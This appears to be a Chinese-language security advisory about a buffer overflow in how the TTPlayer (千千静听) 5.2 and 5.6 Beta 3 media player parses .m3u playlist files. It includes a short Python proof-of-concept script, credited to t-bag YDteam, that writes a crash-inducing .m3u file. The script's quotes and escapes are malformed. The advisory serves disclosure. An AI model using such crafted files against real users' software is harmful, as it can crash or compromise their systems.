漏洞起因
边界条件错误
危险等级
中
影响系统
TTPlayer 5.6 Beta 3
TTPlayer 5.2
不受影响系统
危害
远程攻击者可以利用漏洞以应用程序特权执行任意指令。
攻击所需条件
攻击者必须构建恶意文件,诱使用户访问。
漏洞信息
千千静听是一款国内流行的媒体播放程序。
千千静听播放软件不正确处理".m3u"文件,可触发缓冲区溢出,攻击者构建恶意文件,诱使用户解析,可导致以应用程序权限执行任意指令。
测试方法
# Exploit Title: ttplayer=5.6Beta3 Dos POC
# Date: 2010-01-06
# Author: t-bag YDteam.
# Software Link: http://ttplayer.qianqian.com
# Version: 5.6Beta3
# Tested on: win7 and win2003
# Code :
#!/usr/bin/python
#f# t-bag
crash = ("#ETM3U\n"+’QQ\\1.’+"x41" * 81)
try:
file = open(‘1.m3u’,’w’);
file.write(crash);
file.close();
print "[+] Created crash qianqian file ~"
except:
print "[-] Error :(";
厂商解决方案
目前没有详细解决方案提供:
http://wwwct.ttplayer.com/index.html
漏洞提供者
t-bag YDteam
0 条评论。